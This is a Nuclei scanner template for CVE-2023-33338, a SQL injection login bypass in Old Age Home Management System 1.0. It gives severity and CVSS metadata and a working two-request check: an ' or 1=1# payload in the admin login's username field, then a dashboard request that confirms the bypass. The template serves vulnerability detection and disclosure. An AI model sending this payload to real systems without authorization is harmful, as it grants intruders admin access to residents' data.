id: CVE-2023-33338 info: name: Old Age Home Management System v1.0 - SQL Injection author: Harsh severity: critical description: | Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Old Age Home Management System v1.0. reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 - https://nvd.nist.gov/vuln/detail/CVE-2023-33338 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-33338 cwe-id: CWE-89 epss-score: 0.01754 epss-percentile: 0.87944 cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpgurukul product: old_age_home_management_system tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul http: - raw: - | POST /admin/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=vaday%27+or+1%3D1%23&password=password&submit= - | GET /admin/dashboard.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(body_2, "Change Password")' - 'contains(body_2, "Old Age Home Management System|| Dashboard")' condition: and # digest: 4a0a004730450220603bdc568c4f8bd254d3de537116f53403754a72af1ec456be55b3cc86bbad9b022100fb5e43cac19c09bc220b1ca500ce14df1866cf778dad28ecdc0da95f52ff3ced:922c64590222798bb761d5b6d8e72950